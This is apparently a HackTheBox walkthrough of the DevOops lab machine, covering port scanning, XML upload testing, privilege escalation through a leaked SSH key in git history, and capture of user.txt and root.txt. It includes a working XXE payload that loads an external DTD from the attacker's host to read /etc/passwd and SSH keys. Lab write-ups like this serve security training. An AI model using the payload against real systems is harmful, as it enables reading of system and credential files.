DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

This article shows how to hack the DevOops box and obtain both user.txt and root.txt by using Kali Linux.

DevOops is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article shows how to hack the DevOops box and get user.txt and root.txt.

First, we use NMAP to Scan the server to identify open ports.

ScanPorts
Ports Scan

We find that only two port open (22/TCP and 5000/TCP).

Let’s open the browser, and visit http://10.10.10.91:5000/.

DevOops Website
DevOops Website

It seems to be a website. Then, let’s enumerate the website directory.

After enumeration, we find that there is a page that we can upload XML files.

The website allows users to upload XML files. Let’s try a simple XML first.

1
2
3
4
5
<note>
<Author>Tom</Author>
<Subject>Computer</Subject>
<Content>HowToBuyAMacComputer</Content>
</note>

After we submitted the above file, the website returns a message.

Website Returns Info
Website Returns Info

Now, let’s submit our payload.

First, we create a new XML file:

1
2
3
4
5
6
7
<!--?xml version="1.0" ?-->
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]>
<note>
<Author>&b;</Author>
<Subject>Jani</Subject>
<Content>Reminder</Content>
</note>

Then, we create a DTD file (1.dtd) on our local Kali Linux and insert the following content:

1
<!ENTITY b SYSTEM "file:///etc/passwd" >

We host an HTTP service on our local Kali Linux and move the above DTD file in the website folder.

We then submit the request and observe that we read the /etc/passwd file successfully.

XXE Read /etc/passwd File
XXE Read /etc/passwd File

Since SSH service is running on the server, I am going to attempt to obtain the ssh key.

XXE Read SSH Key File
XXE Read SSH Key File

Then, we obtain user.txt

Obtain User.txt
Obtain User.txt

We identify that there is a “git” user, we try to log in as git.

Login as Git
Login as Git

Then, we check the .bash_history file.

Git User Bash History
Git User Bash History

We found that git user initial a git repo. Let’s go to this folder and see what we can find.

After navigate to the blogfeed folder, we check the git log.

Blogfeed Git Log
Blogfeed Git Log

We find that the user added an ssh key. We then check this commit.

Git Commit
Git Commit

We download the SSH Key and use it to successful log into the target server as root user.

Obtain Root.txt
Obtain Root.txt

This box is not difficult, the box has 2 challenges. The first challenge is to create the XXE payload. The second challenge is enumeration and identify the git user. The box also requires some git commands knowledge.

If you want to read more HackTheBox writeup, you can visit this link.